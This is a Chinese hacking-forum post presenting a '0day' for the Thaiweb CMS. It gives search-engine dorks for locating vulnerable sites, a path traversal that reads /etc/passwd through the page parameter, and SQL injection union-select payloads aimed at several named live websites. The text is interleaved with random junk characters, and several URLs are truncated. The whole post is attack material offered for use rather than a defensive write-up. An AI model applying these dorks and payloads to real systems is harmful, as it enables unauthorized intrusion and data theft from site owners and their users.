找回密码
 立即注册
查看: 2981|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:. u  |; _1 n4 R; _  G- r7 L
- ^1 s1 E9 O( o: h* x) ~/ e9 `& H
intext:powered by Thaiweb
; C! S7 ]2 j: |# b
% b3 Q% P* B# @9 K' e% ^inurl:index.php?page=board.php
. A0 v0 P+ ?* Q9 I# }3 J& e3 |7 ?$ J
# O# D# h! j8 p
6 n3 w' ?- L+ M( W, h" C  _; c. z$ O
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd* F( f( C# K5 p: Z6 u
' K5 e+ i2 s* U$ o6 s4 H
7 f+ J6 r- U$ e

7 N. J$ ^/ j5 }$ ]$ O+ ?# f; p利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
" g! w% x* M  l! K0 L: I
+ L1 h3 @  C7 f/ Q
- M) B* L2 `$ W! A
6 L  q( G  H% q. f: X5 k% k) o% [8 Jhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--6 U+ b2 I# m3 \& {, a( N

$ C2 N7 [/ ]- k  \) F0 X: }' uhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--1 D- b( K* }, T2 a; d4 _2 h. j# c
1 T- g7 V, e1 e0 J$ S( B0 P
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
+ r5 Y' L- q. b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表